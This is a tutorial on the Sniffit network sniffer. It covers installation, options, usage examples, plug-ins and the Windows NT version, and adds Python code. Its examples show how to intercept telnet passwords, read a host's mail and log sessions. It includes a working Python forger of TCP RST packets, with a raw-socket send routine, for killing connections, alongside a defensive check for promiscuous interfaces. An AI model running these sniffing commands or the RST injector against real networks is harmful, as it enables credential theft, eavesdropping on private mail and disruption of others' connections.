Sniffit is a network sniffer written by Brecht Claerhout that runs on Linux, Solaris, SGI, NT and other platforms. It is aimed at the plaintext TCP/IP protocols (telnet, FTP, SMTP and the like) and listens to the traffic of the machines around the host it runs on. As with every sniffer, a packet can only be captured if it passes the interface of the machine running Sniffit, so Sniffit can only listen to machines on the same network segment; on a switched network that means only broadcast traffic and traffic to or from the sniffing host itself, unless the switch mirrors a port.
Because Sniffit is easy to install and powerful, it has become a favourite tool of intruders on UNIX systems. When security checks are done on compromised Internet hosts, a large number of them turn out to have Sniffit installed.
Another feature of Sniffit is that plug-ins can be added freely to implement extra functions; they are described later.
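A sniffer like Sniffit puts the interface into promiscuous mode so that it receives every frame on the segment, and that flag is the first thing to check on a host suspected of running one. The following check is an added example, not part of the original article or of Sniffit: it reads the interface flags that Linux exposes in /sys/class/net/<interface>/flags (a hex value; IFF_PROMISC is 0x100, as defined in <linux/if.h>) and reports interfaces with the bit set. The sysfs path and the flag value are the only assumptions.

```python
# Added example, not part of the original article or of sniffit: a quick check
# for an interface left in promiscuous mode, which is the state a sniffer such
# as sniffit puts the NIC into so that it receives every frame on the segment.
# Linux exposes the interface flags in /sys/class/net/<if>/flags as a hex value;
# IFF_PROMISC is 0x100 (from <linux/if.h>).
import os

IFF_PROMISC = 0x100


def promisc_from_flags(flags_text: str) -> bool:
    """Return True if a flags value as read from sysfs (e.g. '0x1103') has IFF_PROMISC set."""
    return int(flags_text.strip(), 16) & IFF_PROMISC != 0


def promiscuous_interfaces(sysfs="/sys/class/net"):
    """List the interfaces whose flags file shows promiscuous mode ([] on non-Linux systems)."""
    found = []
    if not os.path.isdir(sysfs):
        return found
    for name in sorted(os.listdir(sysfs)):
        try:
            with open(os.path.join(sysfs, name, "flags")) as fh:
                if promisc_from_flags(fh.read()):
                    found.append(name)
        except OSError:
            continue  # virtual interfaces without a flags file, or no permission
    return found


if __name__ == "__main__":
    hits = promiscuous_interfaces()
    print("promiscuous interfaces:", ", ".join(hits) if hits else "none")
```

The same information is shown by `ip link show` as the PROMISC flag. Treat a hit as a lead, not proof: a sniffer that only wants traffic addressed to its own host does not need promiscuous mode, and an intruder can clear the flag again once the capture is over.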
1. Install
1) Run tar zxvf sniffit.*.*.*.tgz to unpack the downloaded sniffit.*.*.*.tgz into the directory you want. For version 0.3.7 you get a sniffit.0.3.7 directory.
2) Change into the sniffit.0.3.7 directory.
3) Run ./configure && make. If no unexpected error appears on the terminal, the compilation succeeded and a sniffit binary is produced that can be run directly (it must be run as root, because opening the interface for sniffing needs that privilege).
4) Run make clean to remove the temporary files.
2. Usage
Sniffit has the following command-line options (option letters are case sensitive):
-v: display version information.
-t <ip nr/name>: sniff the packets destined for the given IP address (target).
-s <ip nr/name>: sniff the packets coming from the given IP address (source). The @ wildcard matches a whole range, for example -t 199.145.@ matches every host in 199.145.0.0/16.
-i: interactive mode: a window shows the machines currently seen connecting on the network.
-I: extended interactive mode. It ignores all other options and is more powerful than -i.
-c <file>: run the program with a configuration script (see "Run a script" below).
-F <device>: force the program to use this network device (for example -F eth0).
-n: also display non-IP ("fake") packets such as ARP and RARP.
-N: run only the plug-ins; all other options are ignored.
The following options do not work in -i mode:
-b: do the work of both -t and -s.
-d: dump the sniffed data to the current terminal in hexadecimal.
-a: dump the sniffed data to the current terminal as ASCII characters.
-x: print extended TCP information (SEQ, ACK, flags). It can be combined with -a, -d, -s, -t and -b. Note that this is written to standard output; if only -t, -s or -b is given without -a or -d, the extra information is not written to the log files.
-R <file>: record all traffic into this file.
-r <file>: play a record file back into Sniffit. It requires -F to name the device the file was recorded on, for example -F eth0 for the first NIC.
-A <char>: replace every unprintable character with this character.
-P <protocol>: select the protocol to sniff. The default is TCP; IP, ICMP and UDP can also be chosen.
-p <port>: select the port to sniff. The default (0) is all ports.
-l <length>: set how many bytes of each packet are kept. The default is 300.
-M <plugin>: activate the plug-in.
The following option is used in -i and -I mode:
-D <device>: send all output to this device (for example a tty).
The following option is used in -c mode:
-L <logparam>: logparam can be one or more of:
raw: raw logging
norm: normal logging
telnet: record passwords (port 23)
ftp: record passwords (port 21)
mail: record mail traffic (port 25)
These values can be combined, for example -L telnet ftp mail norm.
1) Interactive (window) interface:
With the -i option mentioned above you enter Sniffit's window interface: run sniffit -i and a window environment appears in which you can see which machines on your network are connected and which port numbers they use. The available keys are:
g: generate a packet. Normally only UDP packets are generated; you are asked a few questions about the packet to send.
n: open a small window listing the protocols (TCP, IP, ICMP, UDP and others).
r: refresh the screen and re-display the connected machines.
q: close the window and end the program.
F1: change the source IP address mask. The default is all.
F2: change the destination IP address mask. The default is all.
F3: change the source port mask. The default is all.
F4: change the destination port mask. The default is all.
2) Example:
Assume two hosts on one subnet: one runs Sniffit and is called sniffit.com, the other has the IP address 66.66.66.7 and is called target.com. Proceed as follows:
1. Check that the sniffer works:
sniffit:~# sniffit -d -p 7 -t 66.66.66.7
And in another window:
sniffit:~$ telnet target.com 7
Sniffit captures the packets of the echo service (port 7) on the remote host, which is a quick way to verify that the interface is really being sniffed.
2. Intercept user passwords on target.com:
sniffit:~# sniffit -p 23 -t 66.66.66.7
This sniffs only the packets to the TELNET port (23).
3. If the root user of target.com reports a strange FTP connection and wants to record what it does:
sniffit:~# sniffit -p 21 -l 0 -t 66.66.66.7
4. Read all mail going in and out of target.com:
sniffit:~# sniffit -p 25 -l 0 -b -t 66.66.66.7 &
or
sniffit:~# sniffit -p 25 -l 0 -b -s 66.66.66.7 &
5. Intercept the control messages exchanged when an error occurs:
sniffit:~# sniffit -P icmp -b -s 66.66.66.7
6. Sniff every packet from 66.66.66.7 and monitor it completely:
sniffit:~# sniffit -P ipicmptcp -p 0 -b -a -d -x -s 66.66.66.7
7. Record telnet sessions into log files (Sniffit names them after the connection, so more 66* reads them), replacing unprintable characters with the character given to -A:
sniffit:~# sniffit -p 23 -A . -t 66.66.66.7
or
sniffit:~# sniffit -p 23 -A ^ -t dummy.net
3. Advanced applications
1. Run a script
This goes with the -c option and is simple to use. For example, write a file named sh with the following lines:
select from host 180.180.180.1
select to host 180.180.180.10
select both port 21
Then run: sniffit -c sh
Note: this sniffs the packets sent from 180.180.180.1 to 180.180.180.10 on the FTP port (21).
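The command-line examples above and the script just shown both come down to the same thing: decode each frame, keep it only if source, destination and port match, and dump the payload. The following is an added example, not code from the article or from Sniffit: an offline model of what -t/-s/-p, the -a/-d/-x dumps and the "select ... host/port" script do, run over three frames constructed here (one of them the FTP login from the script's example). Everything is hand-built and offline; combining all select lines with AND follows the article's note and is an assumption about the real tool's semantics.

```python
# Added example, not code from the article or from sniffit: an offline model of
# what the -t/-s/-p options, the -a/-d/-x dumps and the "select ... host/port"
# script used with -c do. The frames and the script are constructed here for the
# example; combining all "select" lines with AND follows the article's note and
# is an assumption about the real tool.
import struct
import ipaddress

TCP_FLAG_NAMES = {0x01: "FIN", 0x02: "SYN", 0x04: "RST", 0x08: "PSH", 0x10: "ACK", 0x20: "URG"}


def build_frame(src, dst, sport, dport, seq, ack, flags, payload):
    """Ethernet II + IPv4 + TCP frame; checksums left at zero (the decoder ignores them)."""
    tcp = struct.pack("!HHIIHHHH", sport, dport, seq, ack, (5 << 12) | flags, 8192, 0, 0) + payload
    ip = struct.pack("!BBHHHBBH4s4s", 0x45, 0, 20 + len(tcp), 0, 0, 64, 6, 0,
                     ipaddress.IPv4Address(src).packed, ipaddress.IPv4Address(dst).packed)
    return b"\xaa" * 6 + b"\xbb" * 6 + b"\x08\x00" + ip + tcp


def decode_frame(frame):
    """Parse an IPv4/TCP frame into a dict; return None for non-IP or non-TCP frames."""
    if len(frame) < 34 or frame[12:14] != b"\x08\x00":
        return None
    ip = frame[14:]
    ihl, total_len, proto = (ip[0] & 0x0F) * 4, struct.unpack("!H", ip[2:4])[0], ip[9]
    if proto != 6:
        return None
    tcp = ip[ihl:total_len]
    sport, dport, seq, ack, off_flags = struct.unpack("!HHIIH", tcp[:14])
    return {"src": str(ipaddress.IPv4Address(ip[12:16])), "dst": str(ipaddress.IPv4Address(ip[16:20])),
            "sport": sport, "dport": dport, "seq": seq, "ack": ack,
            "flags": off_flags & 0x3F, "payload": tcp[(off_flags >> 12) * 4:]}


def parse_select_script(text):
    """Turn 'select from|to|both host|port VALUE' lines into (direction, kind, value) rules."""
    rules = []
    for line in text.splitlines():
        words = line.split()
        if len(words) == 4 and words[0].lower() == "select":
            kind = words[2].lower()
            rules.append((words[1].lower(), kind, int(words[3]) if kind == "port" else words[3]))
    return rules


def matches(pkt, rules):
    """True if the packet satisfies every rule (from = source side, to = destination side)."""
    for direction, kind, value in rules:
        side = {"host": ("src", "dst"), "port": ("sport", "dport")}[kind]
        wanted = {"from": [side[0]], "to": [side[1]], "both": list(side)}[direction]
        if value not in [pkt[f] for f in wanted]:
            return False
    return True


def ascii_dump(payload, sub="."):
    """What -a (with -A <char>) shows: printable bytes as-is, everything else as sub."""
    return "".join(chr(b) if 32 <= b < 127 else sub for b in payload)


def hex_dump(payload):
    """What -d shows."""
    return " ".join(f"{b:02x}" for b in payload)


def tcp_info(pkt):
    """What -x adds: sequence and ack numbers plus the flag names."""
    names = [n for bit, n in TCP_FLAG_NAMES.items() if pkt["flags"] & bit]
    return f"SEQ={pkt['seq']:#x} ACK={pkt['ack']:#x} FLAGS={'|'.join(names)}"


# Constructed sample traffic, and the script from the article's example.
SCRIPT = "select from host 180.180.180.1\nselect to host 180.180.180.10\nselect both port 21\n"
FRAMES = [
    build_frame("180.180.180.1", "180.180.180.10", 1025, 21, 0x1000, 0x2000, 0x18, b"USER root\r\n"),
    build_frame("180.180.180.1", "180.180.180.10", 1026, 80, 0x3000, 0x4000, 0x18, b"GET / HTTP/1.0\r\n"),
    build_frame("180.180.180.7", "180.180.180.10", 1027, 21, 0x5000, 0x6000, 0x18, b"PASS hunter2\r\n"),
]


def sniff(frames, script):
    """Return the dump lines for the frames that pass the script's filter."""
    rules = parse_select_script(script)
    out = []
    for pkt in filter(None, map(decode_frame, frames)):
        if matches(pkt, rules):
            out.append(f"{pkt['src']}.{pkt['sport']}-{pkt['dst']}.{pkt['dport']} "
                       f"{tcp_info(pkt)}: {ascii_dump(pkt['payload'])}")
    return out


if __name__ == "__main__":
    print("\n".join(sniff(FRAMES, SCRIPT)))
```

Running it prints only the FTP login from 180.180.180.1 to 180.180.180.10; the HTTP request and the login from the other client are dropped by the rules, which is exactly why the plaintext USER/PASS lines of FTP and telnet are what a sniffer on the segment harvests first.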
2. Plug-ins
To add a plug-in, put its source in the sniffit directory and edit the sn_plugin.h file as follows:
#define PLUGIN1_NAME "My plugin"
#define PLUGIN1(x) main_plugin_function(x)
#include "my_plugin.plug"
Where:
1) Plug-in slots run from 0 to 9 (PLUGIN0_NAME, PLUGIN1_NAME, ... PLUGIN9_NAME); the numbers used need not be contiguous.
2) #include "my_plugin.plug" names the file in which your plug-in source code is placed. Since the plug-in is compiled into the binary this way, rebuild Sniffit afterwards.
3. The todd plug-in
Todd is the best-known Sniffit plug-in. Its name is short for Touch Of Death, because it can cut a TCP connection with ease. It works by sending a spoofed TCP segment, with the RST flag set and a sequence number the receiver accepts, to one of the hosts in the connection; that host then tears the connection down.
To install todd, copy the downloaded todd.tar.gz into the directory where sniffit is, unpack it, and run ln -s todd sniffit_key5 to bind the program to the F5 key. To cut a connection, point the cursor at the connection to be killed in the window and press F5. The other F keys can be bound the same way, but F1 to F4 cannot be used because they are already defined.
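What the plug-in has to build is shown below as an added example; it is not todd's own code. Given one segment observed on the wire (addresses, ports and sequence numbers are constructed here), it forges an RST for each direction with valid IP and TCP checksums: one towards the destination as if sent by the source, carrying the next sequence number the source would use, and one towards the source as if sent by the destination, carrying the acknowledgement number the source just advertised. The raw-socket send is defined but not called, since it needs root and a real target.

```python
# Added example, not the todd plug-in's code: how a "touch of death" forges the
# TCP RST that kills a connection. Given one segment observed on the wire (all
# addresses and sequence numbers below are constructed), it builds an RST for
# each direction with correct IP and TCP checksums. Sending requires a raw socket
# (root) and is only defined here, not called.
import socket
import struct
import ipaddress


def checksum(data):
    """RFC 1071 ones-complement sum over 16-bit words (used for both IP and TCP)."""
    if len(data) % 2:
        data += b"\x00"
    total = sum(struct.unpack("!%dH" % (len(data) // 2), data))
    while total >> 16:
        total = (total & 0xFFFF) + (total >> 16)
    return ~total & 0xFFFF


def build_rst(src, dst, sport, dport, seq):
    """IPv4 packet carrying a TCP segment with only RST set, the given seq, ack 0."""
    src_b, dst_b = ipaddress.IPv4Address(src).packed, ipaddress.IPv4Address(dst).packed
    tcp = struct.pack("!HHIIHHHH", sport, dport, seq, 0, (5 << 12) | 0x04, 0, 0, 0)
    pseudo = src_b + dst_b + struct.pack("!BBH", 0, 6, len(tcp))
    tcp = tcp[:16] + struct.pack("!H", checksum(pseudo + tcp)) + tcp[18:]
    ip = struct.pack("!BBHHHBBH4s4s", 0x45, 0, 20 + len(tcp), 0, 0x4000, 64, 6, 0, src_b, dst_b)
    ip = ip[:10] + struct.pack("!H", checksum(ip)) + ip[12:]
    return ip + tcp


def rst_pair(observed):
    """Two RSTs for a segment seen going src->dst: one to dst as if from src (seq = next
    byte the source would send) and one to src as if from dst (seq = the ack the source
    just advertised). Either lands inside the peer's receive window."""
    to_dst = build_rst(observed["src"], observed["dst"], observed["sport"], observed["dport"],
                       (observed["seq"] + observed["payload_len"]) & 0xFFFFFFFF)
    to_src = build_rst(observed["dst"], observed["src"], observed["dport"], observed["sport"],
                       observed["ack"])
    return [to_dst, to_src]


def checksums_ok(packet):
    """Verify both checksums: a header with a correct checksum sums to zero under checksum()."""
    ip, tcp = packet[:20], packet[20:]
    pseudo = ip[12:16] + ip[16:20] + struct.pack("!BBH", 0, 6, len(tcp))
    return checksum(ip) == 0 and checksum(pseudo + tcp) == 0


def send_raw(packet):
    """Inject the packet with a raw socket (needs root; IP_HDRINCL keeps our own IP header)."""
    with socket.socket(socket.AF_INET, socket.SOCK_RAW, socket.IPPROTO_RAW) as s:
        s.setsockopt(socket.IPPROTO_IP, socket.IP_HDRINCL, 1)
        s.sendto(packet, (str(ipaddress.IPv4Address(packet[16:20])), 0))


# Constructed observation: the telnet server on 66.66.66.7 just sent 10 bytes to a client.
OBSERVED = {"src": "66.66.66.7", "dst": "66.66.66.1", "sport": 23, "dport": 40000,
            "seq": 1000, "ack": 5000, "payload_len": 10}

if __name__ == "__main__":
    for p in rst_pair(OBSERVED):
        print(p.hex(), "checksums ok:", checksums_ok(p))
```

In the interactive window the plug-in gets these values from the connection under the cursor; the point of running it inside a sniffer is that the live sequence numbers are already known. That is also the caveat: a stack that implements RFC 5961 accepts an RST only when its sequence number is exactly the next expected one and answers an in-window but inexact RST with a challenge ACK, so a guess is not enough and the observed segment must be recent.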
4. Sniffit NT version
Sniffit 0.3.7 introduced an NT version, which also runs on Windows 2000. Installing it requires the WinPcap package, the Win32 counterpart of libpcap: it captures packets for network analysis and is based on the libpcap and BPF (Berkeley Packet Filter) model from Unix. It consists of a kernel-level packet filtering driver, a low-level dynamic link library (packet.dll) and a high-level, system-independent library (libpcap, based on version 0.4a6).
The WinPcap packet capture driver runs on Windows 95, Windows 98, Windows NT and Windows 2000 and lets programs capture and send raw packets; packet.dll is the API that gives direct access to the BPF driver. It can be found on the Internet.
Install Sniffit on NT as follows:
1) Download Packet.exe and start the installation.
2) Open the Control Panel, double-click "Network and Dial-up Connections", open "Local Area Connection" and select "Properties".
3) In the dialog that appears, select "Install" to add a network component.
4) In the next dialog select "Protocol" and click "Add".
5) In the next dialog select "Have Disk" and browse to the correct path, that is, the unpacked network driver folder (it must contain packet.inf and packet.sys), then select "OK".
6) Select "Packet capture Driver v X.XX" and follow the instructions (the system disk may be requested).
7) Check that the line "Packet capture Driver v X.XX" now appears among the network components. If it does, the driver has been installed and bound to the network adapter.
8) Restart the computer.
9) Unpack sniffit_nt0.3.7beta; it can be used directly. Usage is the same as for Sniffit on Unix.